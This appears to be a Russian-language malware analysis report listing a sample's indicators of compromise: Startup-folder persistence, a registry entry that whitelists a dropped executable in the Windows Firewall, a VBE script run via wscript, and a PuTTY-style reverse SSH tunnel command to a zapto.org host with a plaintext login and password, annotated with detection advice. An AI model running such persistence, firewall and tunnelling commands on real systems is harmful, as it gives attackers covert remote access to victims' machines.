Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\Chrome.lnk
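- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] 'C:\Real.Time.Protection\tdtrtrd.exe' = 'C:\Real.Time.Protection\tdtrtrd.exe:*:Enabled:tdtrtrd'
  (эта запись в списке AuthorizedApplications профиля StandardProfile вносит tdtrtrd.exe в число приложений, разрешённых брандмауэром Windows: «*» — область «любой адрес», «Enabled» — правило включено)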
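- 'C:\Real.Time.Protection\dhgdff.exe' -ssh -R 7526:127.0.1.3:3103 httpsnew1.zapto.org -l usersox -pw 2n16122N
  (судя по параметрам -ssh, -R, -l, -pw и файлу PUTTY.RND в списке ниже, dhgdff.exe — по-видимому, консольный SSH-клиент семейства PuTTY; -R 7526:127.0.1.3:3103 задаёт обратный проброс порта: порт 7526 на стороне SSH-сервера перенаправляется на 127.0.1.3:3103 на заражённой машине. Этой команде соответствуют приведённые ниже DNS-запрос и подключение к порту 22 того же узла. Признак для обнаружения — исходящее SSH-соединение от процесса, запущенного из нестандартного каталога.)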
- 'C:\Real.Time.Protection\tdtrtrd.exe'
- '<SYSTEM32>\wscript.exe' "C:\Real.Time.Protection\chrome.vbe"
- C:\Real.Time.Protection\dhgdff.exe
- C:\Real.Time.Protection\tdtrtrd.exe
- <LS_APPDATA>\PUTTY.RND
- C:\Real.Time.Protection\chrome.vbe
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- C:\Real.Time.Protection\000000.cfg
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- 'ht####ew1.zapto.org':22
- DNS ASK ht####ew1.zapto.org
- ClassName: 'Shell_TrayWnd' WindowName: ''